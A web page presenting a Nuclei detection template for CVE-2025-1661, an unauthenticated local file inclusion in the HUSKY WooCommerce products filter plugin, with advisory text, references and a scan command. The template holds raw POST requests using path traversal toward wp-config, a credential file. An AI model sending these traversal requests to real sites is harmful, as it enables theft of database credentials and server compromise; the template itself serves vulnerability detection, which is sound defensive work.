Skip to content

HUSKY – Products Filter Professional for WooCommerce <= 1.3.6.5 - Unauthenticated Local File Inclusion

ID: CVE-2025-1661

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2025,woocommerce-products-filter,wordpress,wp-plugin,wp,woocommerce

The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.6.5 via the ‘template’ parameter of the woof_text_search AJAX action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.

id: CVE-2025-1661
info:
name: HUSKY – Products Filter Professional for WooCommerce <= 1.3.6.5 - Unauthenticated Local File Inclusion
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.6.5 via the 'template' parameter of the woof_text_search AJAX action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
remediation: Update to version 1.3.6.6, or a newer patched version
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-products-filter/husky-products-filter-professional-for-woocommerce-1365-unauthenticated-local-file-inclusion
- https://plugins.trac.wordpress.org/browser/woocommerce-products-filter/trunk/ext/by_text/index.php
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3249621%40woocommerce-products-filter&new=3249621%40woocommerce-products-filter&sfp_email=&sfph_mail=
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3253169%40woocommerce-products-filter&new=3253169%40woocommerce-products-filter&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae7b6fc-2120-4573-8b1b-d5422d435fa5?source=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-1661
cwe-id: CWE-22
epss-score: 0.00061
epss-percentile: 0.29153
metadata:
verified: true
max-request: 2
publicwww-query: "/wp-content/plugins/woocommerce-products-filter/"
tags: cve,cve2025,woocommerce-products-filter,wordpress,wp-plugin,wp,woocommerce
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-admin/admin-ajax.php?template=../../../../../../../wp-config&value=a&min_symbols=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=woof_text_search&
matchers:
- type: dsl
dsl:
- contains_all(body, 'options','min_symbols',"..\\/..\\/..\\/..\\/..\\/..\\/..\\/wp-config")
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php?template=../../../../../../../wp-configx&value=a&min_symbols=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=woof_text_search&
matchers:
- type: dsl
dsl:
- contains_all(body, 'options','woof_husky_txt-option-title','woof_husky_txt-option-text','Wrong path to template','..\\/..\\/..\\/..\\/..\\/..\\/..\\/wp-configx')
condition: and
# digest: 4a0a00473045022100e112de7cbe24795e54206e48e41650f55496ada445ac65cebd808d4bc531a8460220788740c9806592896a49c14f76889677870033ac2f54a4d9ec92c4603de855cd:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-1661.yaml"

View on Github